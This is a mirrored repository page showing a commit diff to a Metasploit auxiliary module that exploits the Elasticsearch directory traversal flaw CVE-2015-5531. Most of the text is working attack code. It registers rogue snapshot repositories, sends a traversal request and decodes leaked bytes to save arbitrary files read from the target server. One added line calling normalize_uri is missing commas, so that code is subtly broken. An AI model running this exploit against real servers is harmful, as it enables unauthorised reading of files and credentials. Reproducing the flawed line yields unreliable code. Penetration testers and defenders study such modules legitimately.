infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Last fix, including espreto minor changes

bug/bundler_fix
jaguasch 2015-10-13 18:41:51 +01:00
parent 772f9d8742
commit d933962ff9
1 changed files with 15 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
modules/auxiliary/scanner/http/elasticsearch_traversal.rb
View File

@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
'References' => 'References' =>
[ [
['CVE', '2015-5531'], ['CVE', '2015-5531'],
['URL', 'https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html'],
['PACKETSTORM', '132721'] ['PACKETSTORM', '132721']
], ],
'Author' => 'Author' =>
@ -30,6 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Benjamin Smith', # Vulnerability discovery 'Benjamin Smith', # Vulnerability discovery
'Pedro Andujar <pandujar[at]segfault.es>', # Metasploit module 'Pedro Andujar <pandujar[at]segfault.es>', # Metasploit module
'Jose A. Guasch <jaguasch[at]gmail.com>', # Metasploit module 'Jose A. Guasch <jaguasch[at]gmail.com>', # Metasploit module
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) ))
@ -46,14 +46,14 @@ class Metasploit3 < Msf::Auxiliary
def proficy? def proficy?
res1 = send_request_raw('method' => 'POST', res1 = send_request_raw('method' => 'POST',
'uri' => '/_snapshot/pwn', 'uri' => normalize_uri(target_uri.path '_snapshot' 'pwn'),
'data' => '{"type":"fs","settings":{"location":"dsr"}}') 'data' => '{"type":"fs","settings":{"location":"dsr"}}')
res2 = send_request_raw('method' => 'POST', res2 = send_request_raw('method' => 'POST',
'uri' => '/_snapshot/pwnie', 'uri' => normalize_uri(target_uri.path, '_snapshot' 'pwnie'),
'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}') 'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
if res1.body =~ /true/ && res2.body =~ /true/ if res1.body.include?('true') && res2.body.include?('true')
return true return true
else else
return false return false
@ -73,19 +73,21 @@ class Metasploit3 < Msf::Auxiliary
if proficy? if proficy?
vprint_good("#{peer} - Check successful") vprint_good("#{peer} - Check successful")
else else
vprint_error("#{peer} - ElasticSearch not vulnearble") print_error("#{peer} - ElasticSearch not vulnerable")
return return
end end
vprint_status("#{peer} - Retrieving file contents...") vprint_status("#{peer} - Retrieving file contents...")
res = send_request_raw('method' => 'GET', res = send_request_raw(
'uri' => travs) 'method' => 'GET',
'uri' => travs
)
if res && res.code == 400 if res && res.code == 400
return res.body return res.body
else else
vprint_status("#{res.code}\n#{res.body}") print_status("#{res.code}\n#{res.body}")
return nil return nil
end end
end end
@ -95,17 +97,13 @@ class Metasploit3 < Msf::Auxiliary
filename = filename[1, filename.length] if filename =~ %r{/^\//} filename = filename[1, filename.length] if filename =~ %r{/^\//}
contents = read_file(filename) contents = read_file(filename)
fail_with(Failure::UnexpectedReply, "#{peer} - File not downloaded") if contents.nil?
if contents.nil?
print_error("#{peer} - File not downloaded")
return
end
begin begin
data_hash = JSON.parse(contents) data_hash = JSON.parse(contents)
rescue JSON::ParserError rescue JSON::ParserError => e
vprint_error("#{peer} - Unable to parse JSON") elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
return return []
end end
fcontent = data_hash['error'].scan(/\d+/).drop(2).map(&:to_i).pack('c*') fcontent = data_hash['error'].scan(/\d+/).drop(2).map(&:to_i).pack('c*')
@ -118,8 +116,6 @@ class Metasploit3 < Msf::Auxiliary
fcontent, fcontent,
fname fname
) )
vprint_good("#{peer} - File saved in: #{path}") print_good("#{peer} - File saved in: #{path}")
end end
end end